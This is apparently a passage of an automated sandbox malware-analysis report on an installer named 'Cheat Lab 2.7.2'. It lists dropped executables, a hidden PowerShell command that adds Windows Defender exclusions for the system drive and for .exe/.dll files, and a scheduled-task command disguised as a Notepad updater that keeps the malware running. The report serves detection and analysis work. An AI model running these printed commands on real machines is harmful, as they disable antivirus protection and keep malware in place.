                    Source: connect.exeString found in binary or memory: FVfnl4yeuSiVk+jiJVF0Mr52dH/adDcDoEL+0QvC82BBNvNfiDcOPzSbEn8KbKPFXmSz6flFNV+b2z0Z0nzAmDT941n65Rq3W6uUqPdzrn1rqo0ZhPNJhXpCbZX4iwhntg
                    Source: C:\Windows\System32\msiexec.exeAutomated click: Install
                    Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: OK
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab IncJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat LabJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.batJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\script.luaJump to behavior
                    Source: Cheat.Lab.2.7.2.msiStatic file information: File size 2020352 > 1048576
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIC01A.tmp, 00000006.00000000.1435656250.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIC01A.tmp, 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, 66bc0c.msi.2.dr
                    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: connect.exe, 00000016.00000002.2145496559.00000000081C2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Cheat.Lab.2.7.2.msi, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, MSIACBE.tmp.0.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr, 66bc0c.msi.2.dr, MSIAB91.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: Cheat.Lab.2.7.2.msi, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, MSIACBE.tmp.0.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr, 66bc0c.msi.2.dr, MSIAB91.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIC01A.tmp, 00000006.00000000.1435656250.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIC01A.tmp, 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, 66bc0c.msi.2.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: Cheat.Lab.2.7.2.msi, MSIBEB1.tmp.2.dr, 66bc0d.rbs.2.dr, MSIBE81.tmp.2.dr, MSIBF2F.tmp.2.dr, 66bc0c.msi.2.dr

                    Data Obfuscation

                    barindex
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F5323C push ecx; ret 6_2_00F5324F
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A3499C push rbp; ret 9_2_00007FF738A349D8
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FDFD499C push rbp; ret 18_2_00007FF6FDFD49D8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040A160 push eax; ret 22_2_0040A193
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00402555 push ecx; ret 22_2_00402568
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CE1094 push eax; iretd 22_2_04CE2549
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CEB0DF push ebp; iretd 22_2_04CEB0E2
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CEB0DB push ebp; iretd 22_2_04CEB0DE
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CEB0D9 push ebp; iretd 22_2_04CEB0DA
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CEAD10 push edx; iretd 22_2_04CEAD1A
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CEA94B push eax; iretd 22_2_04CEA952
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CEA949 push ecx; iretd 22_2_04CEA94A
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FD1F12 push eax; ret 22_2_07FD1F21
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0808614D push FFFFFF8Bh; iretd 22_2_08086150
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080862D0 push esp; ret 22_2_080863D1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0812DC5E push esi; retf 22_2_0812DC61
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0812DD91 push ds; iretd 22_2_0812DDC1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0812DDD2 push ebp; iretd 22_2_0812DDD5
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0812DDD6 pushad ; iretd 22_2_0812DDD9
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08127DE3 push FFFFFF8Bh; iretd 22_2_08127DEA
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_081295B0 push eax; ret 22_2_081295C3
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08154AB0 push FFFFFFC3h; ret 22_2_08154AD0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00408000 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject,22_2_00408000
                    Source: LuaJIT.exe.2.drStatic PE information: section name: _RDATA
                    Source: NzEz.exe.9.drStatic PE information: section name: _RDATA
                    Source: connect.exe.9.drStatic PE information: section name: .jkqvbz

                    Persistence and Installation Behavior

                    barindex
                    Drops executables to the windows directory (C:\Windows) and starts them
                    Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIC01A.tmpJump to behavior
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeFile created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAB91.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAEF5.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAC8E.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAC5E.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAEA5.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBE32.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC01A.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAD1D.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIACBE.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBE12.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAC3E.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBD45.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBF2F.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID76E.tmpJump to dropped file
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeFile created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBE81.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBDB3.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAEC5.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA9B.tmpJump to dropped file
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeFile created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID74E.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBE32.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC01A.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBE12.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBD45.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBF2F.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBE81.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBDB3.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA9B.tmpJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 11:45 /f /tn NotepadUpdateTask_NzEz /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua""
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LuaJITJump to behavior
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LuaJITJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
